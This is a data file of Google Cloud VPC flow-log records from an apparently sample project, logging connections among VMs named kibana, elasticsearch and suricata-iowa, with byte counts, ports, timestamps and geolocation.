-{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"198.51.100.107","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"203.0.113.134","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"203.0.113.134","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"203.0.113.58","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proj
ect","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"203.0.113.134","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"203.0.113.58","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_
id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"bxuq05fhgmw9d","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"198.51.100.182","src_port":41818},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:13.478093057Z","packets_sent":"4","reporter":"DEST","rtt_msec":"1350","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw90","jsonPayload":{"bytes_sent":"4580","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"60","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"7580198540
43528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8w","jsonPayload":{"bytes_sent":"270437","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65322},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"668","reporter":"DEST","rtt_msec":"92","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw94","jsonPayload":{"bytes_sent":"19019","connection":{"dest_ip":"203.0.113.58","dest_port":65322,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.408936364Z","packets_sent":"604","reporter":"SRC","rtt_msec":"92","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.703392247Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8x","jsonPayload":{"bytes_sent":"16208","connection":{"dest_ip":"10.87.40.76","dest_port":33568,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"80","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project",
"subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8v","jsonPayload":{"bytes_sent":"9800","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789269849Z","packets_sent":"120","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.455711202Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw8z","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":58026},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"DEST","rtt_msec":"40","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9b","jsonPayload":{"bytes_sent":"19506","connection":{"dest_ip":"10.87.40.76","dest_port":33564,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"180","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"}
,"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw8y","jsonPayload":{"bytes_sent":"1496","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":32882},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9e","jsonPayload":{"bytes_sent":"155675","connection":{"dest_ip":"192.0.2.177","dest_port":60126,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"288","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw98","jsonPayload":{"bytes_sent":"1791","connection":{"dest_ip":"203.0.113.27","dest_port":32882,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:07.811355936Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:07.689331553Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw96","jsonPayload":{"bytes_sent":"28304484","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.212","src_port":39568},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"2400","reporter":"DEST","rtt_msec":"15","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw99","jsonPayload":{"bytes_sent":"2962242","connection":{"dest_ip":"203.0.113.212","dest_port":39568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:02.085146013Z","packets_sent":"1340","reporter":"SRC","rtt_msec":"15","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.480787267Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw93","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":58026,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:09.114674887Z","packets_sent":"7","reporter":"SRC","rtt_msec":"40","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:08.995009558Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9f","jsonPayload":{"bytes_sent":"9611","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33874},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"101","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9j","jsonPayload":{"bytes_sent":"318481","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597223164Z","packets_sent":"181","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866699945Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw97","jsonPayload":{"bytes_sent":"139359","connection":{"dest_ip":"10.87.40.76","dest_port":33874,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933323342Z","packets_sent":"70","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510575555Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.27","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} -{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"198.51.100.182","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
-{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"203.0.113.27","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"}
